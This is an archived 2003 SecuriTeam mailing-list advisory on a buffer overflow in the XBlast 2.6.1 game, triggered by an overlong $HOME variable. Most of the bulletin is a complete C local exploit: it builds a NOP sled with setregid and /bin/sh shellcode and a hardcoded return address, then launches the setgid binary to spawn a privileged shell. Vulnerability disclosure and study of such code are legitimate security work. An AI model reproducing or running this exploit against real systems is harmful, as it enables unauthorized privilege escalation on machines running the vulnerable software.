[EXPL] XBlast Local Root Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 07/28/03

  • Next message: SecuriTeam: "[NT] Analysis of LSD's Buffer Overrun in Windows RPC Interface" 
    To: list@securiteam.com
Date: 28 Jul 2003 14:55:08 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Get Thawte's New Step-by-Step SSL Guide for Apache.
    http://ad.doubleclick.net/clk;5903117;8265118;i

    - - - - - - - - -

      XBlast Local Root Exploit
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.xblast-center.com/> XBlast is a multi-player arcade game for
    X11R5/R6. The game can be played with at least two players and up to four
    players. It was inspired by the video/computer game
    Bomberman(Dynablaster), which was to my knowledge first programmed for
    NEC's PC Engine/Turbo Grafx. Other (commercial) versions of the original
    game exist for IBM-PC, Atari ST, Amiga, NES, GameBoy, and Super NES."

    A buffer inside XBlast could be overflowed by passing a long $HOME
    environment, this overflow will allow execution of arbitrary code.

    DETAILS

    Vulnerable Systems:
     * XBlast version 2.6.1

    /* 0x333xblast => xblast 2.6.1 local exploit
     *
     * xblast could be overflowed by passing a long $HOME
     * env. For more info read advisory @ :
     *
     * http://www.0x333.org/advisories/outsider-003.txt
     *
     * * note * :
     * exploit tested against xblast-2.6.beta-1.i386.rpm
     * under Red Hat Linux 9.0. xblaste is not install
     * by default +s.
     *
     * coded by c0wboy
     *
     * (c) 0x333 Outsider Security Labs / www.0x333.org
     *
     */

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    #define BIN "/usr/X11R6/bin/xblast"
    #define SIZE 1032

    #define RET 0xbffffb38
    #define NOP 0x90

    unsigned char shellcode[] =

            /* setregid (20,20) shellcode */
            "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
            "\xcd\x80"

            /* exec /bin/sh shellcode */

            "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
            "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

    void banner (void);
    void memret (char *, int, int, int);

    void banner (void)
    {
            fprintf (stdout, "\n\n --- xblast local exploit by c0wboy ---\n");
            fprintf (stdout, " --- Outsiders Se(c)urity Labs / www.0x333.org
    ---\n\n");

            fprintf (stdout, " [NOW PRESS 'y' TO SPAWN THE SHELL]\n\n");
    }

    void memret (char *buffer, int ret, int size, int align)
    {
            int i;
            int * ptr = (int *) (buffer + align);
                                                                               
         
            for (i=0; i<size; i+=4)
                    *ptr++ = ret;
                                                                               
         
            ptr = 0x0;
    }

    int main ()
    {
            int ret = RET;
            char out[SIZE];

            memret ((char *)out, ret, SIZE-1, 0);

            memset ((char *)out, NOP, 333);
            memcpy ((char *)out+333, shellcode, strlen(shellcode));

            setenv ("HOME", out, 1);

            banner ();
            execl (BIN, BIN, 0x0);
    }

    ADDITIONAL INFORMATION

    The information was provided by <mailto:c0wboy@tiscali.it> c0wboy

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Analysis of LSD's Buffer Overrun in Windows RPC Interface"

    Relevant Pages